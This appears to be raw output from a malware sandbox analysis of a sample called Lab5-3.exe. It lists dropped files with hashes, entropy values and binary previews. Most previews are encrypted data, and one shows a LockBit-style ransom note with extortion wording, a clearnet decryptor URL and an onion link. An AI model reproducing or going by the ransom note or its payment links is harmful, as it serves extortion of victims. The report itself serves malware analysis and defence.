                                                                                                          Preview:..>...O&...-_.4.......)/..Z...a...Ed..N....5.....@E...ru...Y>$.$m........2..G;.;/..".d17."9u/...X.~.pC_a.[.P6.s.N.....J....]..3.U..#.n....DBH.vi..T.X....a\../..^H....$re.*~G.>....;.h.6.C...3[.T...@i..rb/.D..<..N.U9.W....5..D^.+.c.k~.)4D....T...yR...0).......`1..b/.....S.........O...K...s6........:.P....*.j.p..Q!3..oW.o@.='0..S.F.X...k.....yb.iF~../..B.|.......v.P\#....j~._..1=.x...7..............c..M:..+."LW1.J..\9-.A...e2!K.v.B........W([.u$l.f.i......,.b-..%...d...W?.........E.L...\>.f..._z*...h..h.a.).(..&...X....i.w..F.y.Mk.vD)U].9|Y.W.2[k........e..~@.."...:r.L...+..."t...O..k[w..].(J...Oq......H..y..S.#xM.D..f...&9&..M{.z.G....9`.......'.J.2.....K...rK...v....c.-..M.]0>....QfR.W...dNo.`\.......$....G...o.X[.B...J.\..;....[(-."mx......>.......WC.0:O.rq.A...d"a..N....Y....eY....m..n.5...l..Z........G.d{..HS....[.M..6N.........Z...|..I}.M.s....z..H...i.....wh...<..d.D..WF.........>Y% .~.....,J.....KJ..P...B.S....(.t...mw.H.........:"\.R
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9152
                                                                                                          Entropy (8bit):7.981597138229586
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:dM90VWNYMnJm7unvJi3MHWn7Z2ROt7kG4shbIxuf0Cb:K3NY2JsCJicHWn7aO21uU+tb
                                                                                                          MD5:3C78DED8F4B01CD4856F57F7FCE60735
                                                                                                          SHA1:43E4A892662C909A63FAFF362A3D30A06AFB3D5B
                                                                                                          SHA-256:123211BE4FD4D42A28DA081061293287A40DC053810E2B8A27DFDBCE3DEB883C
                                                                                                          SHA-512:913F969766DF9598D67E6C609C3200CF6572DDD64A0C4E52492157EF0356EE86C805B9F234A3F4E3061DA75BA15D6553E94E0DD7B4445635ED24FD19626E0915
                                                                                                          Malicious:false
                                                                                                          Preview:....*...v.}m)....n0.......qp..=W..O.D....}`.7.f.|...B,.....x5N.l].!..V..q.LZ.(..'[b.e.q$.....N.............l.....L...g.)h,.....RT...Z..:L...%...#........Mm.....t..E2Q..0.V.+..=.Qn.C...z.....[:.c..q..8...Z~{.W.XQ..m... .q/...S.3._..E.W......H2, .z'!J.J....B.2....1.M.O..T.U..4z..Hg#J~..8..4(io...I/0.Y.. ._.^>..K..B).I........h(.Wb.A.hU..<,'...H ((...\.~..F..$....CF...A.v.....%.L..."}..v?.z......7....7.\6[.P..PV.-.f..r.#..A...[T.E'(..M..$..D.aq.gL...&.g.^L%nf.V.,....!a...)....%\.0.G...._bTTG.!Q$I.RO.M%..0|.:.....bK..}..o....:.T0Q.......T....0.....R....A....HNS....P.$..X9..46.......Ic...<;'...v..yy..@..i..q.'x..N........:...\/(...W.h...w.....s.g.jjF."...L....w..o.7.#....e...M....N.2^Z...T$1.EB~[..-.B.2....;..cj.=...GYqC.<.......P....C..Kz0....|..=.o......a..mr....5..g..^....*..b+..!,..N-..U.8kq.T..q.26.eu...x.'8...j6...C...."...;...^+.-..f.|r@..9..&.'......".V..>5(........i.].x...`NI&<.<..wo/...1.S.R=..\..Wg..;..u~l&....u......!...)....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3056
                                                                                                          Entropy (8bit):7.943411049030753
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:nZa4q3ExaEwHWiod56rRJVkZfRBXBAHulFTIxkPsHfUTid3hBaUoSGFcmeykEdEb:ndgEMVWB56rRjkBRBu8T1rGx0uKeY2E+
                                                                                                          MD5:BDDE68600250A0F58F72720C35D3FAF6
                                                                                                          SHA1:CC8FDAF426881839779F10F419D276DFD2654FF2
                                                                                                          SHA-256:9196438B3A020C2F696E9E82F56A3810DF55118A0F972A138CA667C353059273
                                                                                                          SHA-512:75756C528FFBDADBDD5C4ACCB624EBB7A5E3498372EC220A45D5949F569090B84963BEEB2EF6083DDF5EABEF96416AB0D2B90B673851750E087480C070248735
                                                                                                          Malicious:false
                                                                                                          Preview:...E.^. U....2....es.L....?.c@.Z....L46.z.a.9..vo....:.`....qS....o..<.{.N{.;.rz.Y1r;......c...;.B.>.W5..'.=P.-..Tv.Cx....p.....4a.p"...8sW.]....A.......;H..v.OUB.G...K.../.A9p......_.wM-.<+....m.E.E....A..`a..:-|.f...w.a..I..a.X.....C.(vJ.V..).Po-.d.....TB.X..... sxb.....d.....O..]..~l.<|..G.QW.8.S....>>n].....[v.).<......4v.(.z.L..0Q!......^....T....5q.....o8.9....W....r....l.]..Y..R.J&....d..#......).)D8.....*.Tu..#...#....+HE.2n..xbO..U....W.R.\&.,R..\u..;8.?...&*..{*.0@r...o....o..e..Z.A.>.Bjm:l..(.tu.+...)2L...{......e~....\...%=d...p....F.j....&.x..\.TZ.......l.p...}..n3.|..^R..v.C...d..WR.......o...o.W;.....@N.......Qd.fs.'w...;.8.J..U..*/.'t....v.........|.~S.....~hg..?....^F....D.&....Q......<..p..$..G.R.b..d......(^.Np..LH...~*..A..ND0|...KX..i7#x...QU..+0..$.......8..I]....0....Y.#..C*.....v.....q.FP7..IB..K.Z...t.UA..b.......F......~?.B.k...Eh.E.F.$..+k{g..E.tfH.....^.....$.fF7!G.3...O..KV.3...=....:..7.....p,....n6..|
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9152
                                                                                                          Entropy (8bit):7.9791236922297335
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:+DmZc9ETLokT14tyNwqW485Y1qiDoToDRR60fFc7VVkFpiFqgouo0Cb:+qm9E4kTutswH485Y5oyRRPfOhxqyotb
                                                                                                          MD5:D3322C61B5885F3AA29F956F09A31BC1
                                                                                                          SHA1:05557017E594EA8FA7AC4143EEDF537A6DACB225
                                                                                                          SHA-256:5D794941A963DC66CE63F96994FF6893E91A781DD3883E806561F2695CD7F87A
                                                                                                          SHA-512:EA8DB53E8DAA9BFDF8647D05CFD8870CDD80B04E5D87AED5EFD20AE1FA15CEE63FD676C1085477D14E71C134B401E25B0B17352383504EAB2EA6130715C5A6FC
                                                                                                          Malicious:false
                                                                                                          Preview:..7.o...}....0........w..B+x5......K4S.6....B.....to.....(.y.T...?.b... a.z...$l|"...Ie.d...Y.u.M.....xdV.F...D..:...[..V....d.#."~....L..t..I..a._Pf...=..~<.e..&.....j.?b......'f1.2Rc.J......T..u.`#..+Vj#.).W..H....i..W8+.7.E.6..@......t..>.;DR"..7..F?0r..p;F.q..b3..Z.N..Ei............NY.m.].Y..0....}W.h{..)6...J.......m.......E.Qc.:.Q.T...BP.....#.Y....O..d...._wxG..O....\@.ponU.U..z6i.."xAg..d... N."2n.x..I......X...x..ToI$t.-.S..&.L.RUr...gv.......<.a.#Nv."Y*K\........./......Ax.7.OI.d..........u."...-a `..4...;-Vv..@f..ZIl".B..U.-1.C....%......|0..z.bjq..nCl)qW...~..&.Y..1..y.y.|4'..T.....L..!n/>.`.L.:..=.!0f.V.'.>...oZ...9....O.....SX..o.......yD7AD...z...1.9_...oX^..r.q..0Z..i..E.....&.dIu...c...k.<.W7...OSD.Hd.[.%..c.S..G...."........EC.\.q$.J.>b0.UK..2.J..B.=...`..Z.....A.47.......u.V.n..IE.r.Q.=..(.....%.`6...n..HE-...>.S7......oJ.M.U....h ....uB.{~....Q..=..K,......i..S..`..Y....#v.6x....U..M#.KK..y.Pz.Rc.d.+W...|..xJ*~F_.f+..>^.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3056
                                                                                                          Entropy (8bit):7.940257728446637
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:QSi27QqskLh/U5PN8c3nApCdtxpp1g9UqBuyPimHfUTid3hBaUoSGFcmeykEdEE+:QSL7QNulU5Gc3nAputDp14UqwyPi5GxZ
                                                                                                          MD5:A3D9D919B60DB1E17E3C23FC9ED6E680
                                                                                                          SHA1:9FF1F738298F7A3E65D98A083743249A1A770CC1
                                                                                                          SHA-256:B7CD8C2EEBC87E83013502C6290F2927FB8930D455909C11166AC7D0F9354974
                                                                                                          SHA-512:EEE58BC160B6C9E43F557ADFED18D4FA77C6E4EB40462612AB2BFDC9A2C594183A89F8BA33B693F639BF61B0F37B9F7BBB44E615EFB9E9E82E8D34EAED04C046
                                                                                                          Malicious:false
                                                                                                          Preview:..]UoE...=6K...2..x..KV..B..~Kp.6.^.@E..k...9.?q..........d[....L.3.2M4Q.@.....a|..s.]:.MV..#]6..G{Z.....T.}M.G..x.....n...[..3^.....&|`0...$..%.#Y.......[...8{..Z..H....\o.."..j=Bjx.a/&....I....u../......C.XG....=-.....7#.&.9Mm.Hl....]..j*.{h.C.>.."iF:.tG..E.S....l.i.0.Z..5<p\q?.z..%...t...u.O..i.Cm:.$k.g..y.+...6...V..>.~Pk......."y...c.h...fBm%*.x..5..i...c.#Q.8.X....8 .P..l...K..M...q..y"....&.>e6i.`\...&.8...<.H`S\.=M..JD....&...9|:V..\].t*j`z|>...8..Y.Z....[.iy..$..b..[m..[.( .+.b........".....Ik.P..Gb..SN...W......P....md....Q..DM.....y.Jp.8..X{.'.8JU}.F...0.hu..........m..S^......,/...I......cVb.....I.Il.3N..M.D...!.Rh.G..&..V._......5s(..:dL.p..*Cn[..v[.?..@.._8>......w......i..x........Mo....A..6bM G(.t.m..$..yq..x......98....<.R.w..~...z. ,......hJJ.Y..C../%Y...E..`..\vN.S.&..4A?..V.W./..%..o..@x....2...n.?.|`C.?.RBU.],H^.rE>W6X......{.h(k.3..!..d_.MF`0K..{.^?X/...L.UF*..*..':......?...).m.v.?.g..hh(..+../.......;.r.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9152
                                                                                                          Entropy (8bit):7.980611368924219
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:bJ+XtZoMzrQKYmdz9+/uecmqqHQDv3EzkXXou870Cb:bAXtWoYmR4/wIQTeO4uctb
                                                                                                          MD5:E5A81E8D1CDF8F8D2F3F972C260C6A3C
                                                                                                          SHA1:0D54EBAEE5FFC9A7FE852FFA9BB8283ABDD41575
                                                                                                          SHA-256:EFA483B90769BB8B498EC0892D5F9B216B893CA3DA26C84AEEA0DAD1D5C640CC
                                                                                                          SHA-512:E522E6324C570FDA05346B6A33AE41A40482E8CEC96EEDB2AA13F7A73B1A47BD23CA8B5C11C0F4DBF646DB8C2CB9BC545D8DA24FB847C367070CC2FDE45F3908
                                                                                                          Malicious:false
                                                                                                          Preview:R..D....r.0Z.:....8.7..?.r.]K.`h.t{..A$q.Zx".?.X...%.'.w.b8......]kZ...U...AMN....&...i..8 c..k..$.nns.tg...\........x..C...m..$m."d.....F"."...a^]....R.~.p.....tK..N/Z..|.0......U.....6M.......:.{.Y...2..>~j..4.f.a...5K.'n-.......J-u..4.s.G./.-ir.....M./S...R.~..W3X.=E..j9.o....F..C..U..m.\.#..q.P..{c.......@......u.k..Y^.enEue....../....(...:..?...W....O..O.....c..>.@v7c.~40.K-.=..q......8..U..A..xPPKH.~.C...t.o.\....W...{_..&=.($5....t....4..*...R...w3..`..$A.cT.xd.&..0In|......2...L.:..m..@.d..vV.Z.|F....6.).!-...E_........<.....d[B..5......o...~.C9=.s<xG['9.6......+l..L.f...[Wrk.b...w..Z....KmL......o.}.E4..GV.o].F.X..]v1&...L..x8.+.....k$.N...o..<(....Z.(...5d....'.a.V8......J?..R#......%~.i*V.3..?...;....$.)..t.DS....v.m..f....#....O.U.....S9C`8_b.....^.'...,..... .g.5O...9.`-7.. ...$....F......z..s..p...6..s.1U..`.........~~.T.!.p*tq_....lE.......I~pmQ....7........l..0.........i...2..[.}<Q4.(0s..^.\hn.N.g.z..ZpH...V..F.........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:SysEx File - Lexicon
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2512
                                                                                                          Entropy (8bit):7.917067471395106
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HphOv8hn2tVCFJWhKuAWyYye3oyHfUTid3hBaUoSGFcmeykEdEElU92i:Hp0Uhn7DWM3WyuotGx0uKeY2ElUJ
                                                                                                          MD5:35A80FB960D7C8A806CC7045045AB714
                                                                                                          SHA1:EEA4F480AD772BEB531A2855B0AA87E59F19253F
                                                                                                          SHA-256:4CBB3CD01118023984B4877D28380CF00216EBEB6A889D7B849F8AF57F3E6712
                                                                                                          SHA-512:BEC6E6F34FD9633F556F5B29E527AF12D4BED00CF7181BF7C4C11C797D8FD889863ED632736E42DEAA577618EB95EDA254BEE7C3E624898958607ECFD2946497
                                                                                                          Malicious:false
                                                                                                          Preview:....g...y.......~P..89..Nk.........4..i.P>=....M\.o......yc}...0.f.x.cDw.......f/7.M..I....P<?5.-..Z#...v...LX.;._..IYL...S.W?|:....msZ....'b..@o.....e'..Q.0Eb,a.Z.S...P.'... l..`8..n.........@......Q.(.n{rIC.a.b%1.,0..P.I.^...B......iw.....6(v.....G}X.....U.8!....'...;.....A.^'B..u.=7..uW..k..;.j....E.N.......$,F..N:...6..Wz[...Y..H.&8..../..#Bz..=E6..<.....M.%A...RBS.|..M.Y........_(U..HR3.?...:...Y..Y...G...6+.^.aK.......Y-..@....r...=.!h....0...h].X.8Q..C..Rv.....R.Q..l..l.\..a^w.&.&Y.nQ@...p.o....Ws.....F..0.{.j..}.Z.1?.Z3.K..@....q..-..LC+..<.Ij... ......../<lX_.iK.qeZ..o..2...G..pN.....;E..j.....e....os.....J.BR@2...1d!..TV&^..(...\S......*^...c...D3..u:H.<...i...h.....\....{B...c.i..S.......<.!c....p-....i6...9....O*XF5.T0x.]..P'..*.....)|.3.U......K.Y..oe...{.c.U..../`*p.,._F.....vQ>?-.X.....<G.....C..oE.....a..)\.>.t......].>a...47..U.....R..5.q.4..1a...*....c .=.(....5...s....]4;...`..\......N.D\\..H.{ }r....a.[......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9152
                                                                                                          Entropy (8bit):7.980277020407517
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:IVCOao1E+7rhke+7kjoAiCN4pnMYsNfl0Cb:IVCt+nhp+7kjoApNDrtb
                                                                                                          MD5:A7AEE92138BC5405113AEC982E33BB05
                                                                                                          SHA1:C5BF2597839C1A18675BB85603ED7B61C3D44F8E
                                                                                                          SHA-256:83EFCEEAFE5D8A2B696F340FC77FE9728D07D345924B90ECC7B914855E602F3A
                                                                                                          SHA-512:AC63901D76CB42C9422F98CF573043E522FB30708BDE829AB85DAED4A2A04B41390A87C21B8EDE1A4CFCF8EEDC7343E4E1118A4EC9E3D9E468AD22C8997D8D37
                                                                                                          Malicious:false
                                                                                                          Preview:a..D..JP........;M...L..f.....]..6......Y)./.[.......n..L9N .C.WN...t.gG-.....V..*..Ke......:d.......9.....2...&...[.>.{...9`....^.:!.....q..y=.31..<..y.$..-'.H.[......E.N(.B(.x.o.....M....o.uP....C`Ssv@..........Jl8...P^OK...,J._.9..._..oz2b.,.n.KM.!2.o.Q..&.......>..V.f#....@{.0.,...@o=8.`q.U...W..i.4.=.^K.c.!dmc..5....fqh.[..20A...xs....9..U.*7.&.%....@..}f...n%..l...........2X]|.mE.,...G.+.......N.%&+..r[...6.......l...jUMMz..i.v....%#d.2H.n..3....n"X.m....@z$".J...:...O/\.:..U..}^..4.P+k^.&..IdS...1...Vc...t....g.;...uj..!...iOm... j..2...0t...<.....hE..^..?:........s.)$..k..q7.L.R...c.u,.H....<.g.N.P8.n#9{.u]&..?..P.a.gLP.....&bKfH<..o.....Df!....t.c.!.3.3.E,.......Bb..........3.i`..I...{.@^wRZ.....J...'Q.................bb5G...>.gp.....Vm..y...vJ..O+..t77..e.#.ff.?.oF.....U6.n.L.*.~...M...Ub.<.!N....=Y.I.c..k. vH......3s;...g...Wg....^.....c...1c......Gl.._{c.>a.6.'.Q..c.......B.`..$R.I0>oM.t..j...;........xD.6....P`....f
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.914939273654386
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:oWbF+5YO8SeZrFksHfUTid3hBaUoSGFcmeykEdEElU92i:CYO8SezkrGx0uKeY2ElUJ
                                                                                                          MD5:AAFF4751B73E4BCADD317F306C25E9DD
                                                                                                          SHA1:594D17D90CB7D28630DFD4C53D4B57207533F2CB
                                                                                                          SHA-256:F02B73C578B6E42700F2898C24F96AAE679977B3FFF7E91E814E702FEEE54B2F
                                                                                                          SHA-512:F75395659DDE8311D844651B7686EF3D4F87AF750ED7E8D28D7403BDE56F3C831817EFEE3D3F0166B0B0EE73E58BAA213F8690E8161CA0456BCD68C334F7B10C
                                                                                                          Malicious:false
                                                                                                          Preview:8.S.O..;. ..v.6...2...uZ%...Zc....5.O...,.6...bTxz.S...].B.i...@....Y.q...|...UZh9....../.<..\.A..U.....E....w.....N.,T..6.......*k$#f.+.N..!...<....Mva.-..+..C..4.-.A...m...>.y...P...hJ\"qNN.I.!.+...d....hY..U..x..e.B[........k]."...G...j.;...Hz^.[..(9........eJH/l|.M.R.g..t.y,.b:..:i..*.$'..lE.....+9...@.kD1.,.l.m[.....Wr..e.;c......._eFT]~...L}.3.9wZ..Q..XoLz>j.b.2..o..s.D2-.^.....-.S.#%e..h.".......}../.+.}...1<...R...J.>.3g....}..bm...'~q....:...F.........X....:N....Ad@&DR....{...[...{.&.u..U:wL...._..e.<..P.!`)i...........x.T......'.<Q....5=Hv..._..t..n.Xk9.N.N.~.".Xq.?.....s......OV0..5..j.`=...i.)&.G'5..a2.20....".....E:l.P...'.B(...........=.Z@M.?...p.3..AYDQ8C;...........sZ ...F8.x.}.5*.>LM.J.)....y.M_.J....,i.2/....T.Q...u.U..9..K.p"....i.T.6....P......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5840
                                                                                                          Entropy (8bit):7.965790707752572
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:DMoBvICebdRVPQ7cWPpRFN+hnxI6j7MlHKBqR9yoVeNtKhGx0uKeY2ElUJ:goBsdo7crhe6/MlKBI9RENca0Cb
                                                                                                          MD5:27268B0B4A7C761E3A81A1DFA7D0E7FD
                                                                                                          SHA1:95014090971C6C6858CA61AADC94D9DB7FCCDDD9
                                                                                                          SHA-256:A04CF9E711A412C92212D4BE2F1906E0FC85CF00CB89F3E2292415D3C44831BC
                                                                                                          SHA-512:42B20530154FCBAC835206470114B6C4708175CEFFB4B52132F4C01088A35337CFFB0E4CA37DF397060663387241B95C308DA8AC721C95510FC2E13FFEED91E7
                                                                                                          Malicious:false
                                                                                                          Preview:...X..[Wp.{.8.k2..T.Wwu.Y.<uD..c@:..,...o}.4..../.....sJ...].Q]..`.8...I...4`.Ko...od.!yx<.j......)_c@'h..+..].R........*..2&..G...\.:a...r,3...Kc..A3.4!0...k....>.4..t.G.!.Fq.k...^I.sQ.....o.#.......H.NV.m..S.:..@a.*5.......0".j..g.......{..T...A|q.........jp..XH.rY.et5..(...oJ.c.].3.>...w"M.....+...2....c4.......<......?a....P.R.y.{>.@.)[E.=.......c>.JXn4I..,...S./Yd..Yk...>..?.O|.H.uAAf.....A.!....yY....&..)..A=.EP4j.\.{.kh!.R.0./M.Wn.[.v..#/.....{..R.lue......oS...^I.>.....'.C.,HPs...;......N...g..Q.!.c...^.n.,$@Z..7G..v..a[.......@c.g...DX..(...b... .><>2.i!.....s.c.cd^u.-b.e..A.1.G.{.h.2d..U.'.,.hh...&..c:9..KX......S.U._.;.....`.j.*d..##...1....Y..F0..PLV.T..|L.:x..t..R....[.&.k.l<Rk......B.....0>...2S................(.... ....+.|...A...[P9....75.tc,...Zj. D..!+.,............;....".HU6.!\9..lv+`..T......h.J...$]..t..`!.......F...W....d.-.*KY...q..$.....{....V.I..f..]....q".."....39,g...S..5.;......+..w..}hwl8...'{..8#g.6.Z.N_.OA.C.B5,N.Y
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2576
                                                                                                          Entropy (8bit):7.931020190789167
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:S0M1IOkOABKWLHJGI1E4ms5hWgJRHfUTid3hBaUoSGFcmeykEdEElU92i:Sn1PYJHgI1E4m4SGx0uKeY2ElUJ
                                                                                                          MD5:D71B16DA777375B0D05CF1A6E165211B
                                                                                                          SHA1:F21E20F8F4D10A74C86A2B6129E1163BB1469B9F
                                                                                                          SHA-256:6C8ADBBED26DCBA866674ED7950B977E6BEA302D94B84B6DB500FEF80A73F86F
                                                                                                          SHA-512:50218362804CF77125AF8BB6DF15CE07A2B550A54CF91C487946E6A701B1448D87121FB738F5C025EE952F4F91F3DCD1CD5E97B71D7FF68911FABC426974419F
                                                                                                          Malicious:false
                                                                                                          Preview:.g.G'`g...</).%....t*....D@.U)c.K%tu........$C..O.4.^G):.T...........f.VE.....S.>l&g&...}.+.......k.j.P....7.. ...e*%...c"..I..T..).}..zo.......*....1%t.nG.*J5-+hT3v..G/...T%.Y9.S...F..t....N.t?c.....#...U.n......D....a..#.G.U..H(7.....P....".%T\...E....q..?L.[.....t.Tt.?....fS.V%...yTgh.D.......E8.|.J...gH.\........L.~.>...T.a...=.......?..NW.B8Fi...V6......_...#.._...6..H7...]..F1[.A^........7.m...W.l...Eb..}jrl:.A......{.G<...Z9k..L.O.u...........~d.t.,...d"..8...&......{{~;?..N].3......R.6.)....}.'q..#...+....d...Z8f.S...9...KDG}.o..C..t.0B.a....=-.`...(.v..[8..%M....i......gFY..z5._....8...5i.<...1%...2px.....4..cA..Qd.}..K.\..7..%..do).N.4S..Cku@/..g...t.yk.<.dP..1..(.KIW-_..c6wDM(.t..G..P.............e..-......8......*.K..He..D....P.....s_k...M^.)....JQ.0.\.l.N.h..s..^.Q.1..v?..r.b.`D]........CG%<.|.6[....:|...B!.!l.T.Z6..t~P...;)X@..W.....F|.f.7U.&.;S{n\....m..)......}.0....F...(k...G.....3..ly.h.QE) 9.\v.Ut.r(.vg`..s...j..%.A..p
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9152
                                                                                                          Entropy (8bit):7.980409141248247
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:jipk5yL0zyCDLYkq6SDR15OSv2YN8DFg8KHak6plk0Cb:e8yXvDR1N78D7Utb
                                                                                                          MD5:646E5A509C3041B8CEEC3B5CDA57C3D6
                                                                                                          SHA1:D7E1927232618D3FEDF70219F3CB7821D9112C30
                                                                                                          SHA-256:CB6E9CE7115E8660EA9EFF0232A963E47E54C5D1DD36516276AF3C90EF671B9C
                                                                                                          SHA-512:458C8BF0D0902257604FCA327488E1FF4B219162D6EDA1225DA6BABB39D21E7BD443A1A189B94280861A20C6D67EF872C78058413161C4113946410BF4200465
                                                                                                          Malicious:false
                                                                                                          Preview:....zw.!..m.".t.:...S..?...L..}xWX..6c....v.S....;n....+Q...S.S. jA.K..q.X..x.E}}.B...o...f%].r!.2........)?.})..i.I..w..%.<x.UN..R...+n..LhJ..a.Z]b..C.......c..AM.BR..../...A..0.K#.a....9O.V..?..i.C..Y..p..B!...y..L..R.t....B\H........Z%5.y..P.wu....u.;....d....._P!.1...,i^H#...l...J)~u...-..?0o..kiV..^).7-..Rw`v-..YN...N..Y.j....4....2.d6(_..6....f.).V......%..^..Q......h^...1>....(...Z0..Q.. .U.V}..m#.a..,1..........&..V....z9.z[..2.y.2F..?.}.N7..t......M.P.:t2..}..?..<..WE-..W.,...JW.Y..+....<!.Aq~'A...ju...C..."..?...b.WBjZ.....A.TO."...UL...R}Z..!D........<d...i.\."|.Ro....J.../.*MLd.-..b..7....U...8a..s0...r`.."...f!.......c7,~u....?..A.F.....~.a.Y...."8..T..9....lQ;.R.QX../..i ..,..8ZQn..".a .u..DZ...9....~.....s.,Wj2......N..y}.=<.I..{.......K....j.75.D#./.hM..K....F5..GI..-=#.O..t(..He`.M.9g.H..t7.{.I'..N.......,8.....i...o..3.<}.....$...c.t..0.!%...X....ae.[...Db.......a.'.6.....K...+....u.1,T.=.tW..&.o.7.(....%|j....Q..w.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):7.930577602562852
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IaETa6jOlNfotYvqSZDZE9mhCPHfUTid3hBaUoSGFcmeykEdEElU92i:YAXVDEmPGx0uKeY2ElUJ
                                                                                                          MD5:170A615FE82A6E91E7969965236101B8
                                                                                                          SHA1:FF4CD61E2CA15469B008E4BD1CFA3CAC06097C4C
                                                                                                          SHA-256:9C730D89AC6EF01C7F9B2E4FE10675B1220581CF57FC159C8D8BAA5A472B3097
                                                                                                          SHA-512:019432FE12DC00BC3D07F953762B5217FD6949C4A9760F25A19636135A553A7C9E69CA0277F81F4104D91EDC9E649193F2A825CC452EAAE7BDFDBC4C1F2B3DA1
                                                                                                          Malicious:false
                                                                                                          Preview:.....7*.?...z....\..H..M.z&...4j ./.....2X...k....o*7.......}.4..X...x*Z..$\%.k(.L.6.(h.....O....z-.R../x.m+...[..n...F!A.y....=.~......I..U.......+Ow..Ut.&e...n..GC'../;..o.......D....X..C.3...Q..c........M.W.,.v.G.hL+PS.....Mb.u3..I..K.eg%..4...u.....Je. y!....-..z........ #o...........:..KC..2.......@$.p.....QV.].......cD...x..^...)..l=.....vH.`...g...@........=jz..~.G....W...-~0..W...1..Fh.....y\ON.....!2*......H%.D..U..7.....>.....Ct..Y...iG...r.9S...p....l.k3.l....:Xz{..).j..p...Q..)..~.....ci..4T...Z.h...._..\....p...)._3R.........J..4O...Q....]...D..}.....D.._V.W...q0.}..:..V.>...k~.tJ.}....p!%;f.` ...vJ~GB.[^d.6......a\....f.!.<.m..9.8MA.>.l...#..$..\....1.d.ua.f;.Y ....X1Gi.g.WZo.{.1..i....R:.....P..!#8.K.3'...F...5..)...I.7.x`....L%..z4k...X..<.|a...:..Z.I.....d...........2.[...b5.d...!..0...)1...F..M.%...x..%........v..z.9.<n...}n-.....Z.}L.e&...........^,x`~.$~....]R........N......#......s:~...vb.26;.%?..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9152
                                                                                                          Entropy (8bit):7.978916693492894
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:h3Cc8cm05hZWstHCzM/m5/ZTTGAL5O5R0Cb:hSrtsIQO5/FGAL5sRtb
                                                                                                          MD5:84B0CC22C2AFDE407F161794C31D9F74
                                                                                                          SHA1:545A184240497CEA87D52286090F9796A89A7002
                                                                                                          SHA-256:182FBBA3338C3DCF717781D4CFD229A71C63F80E848E52932DF38EA0156EDFD9
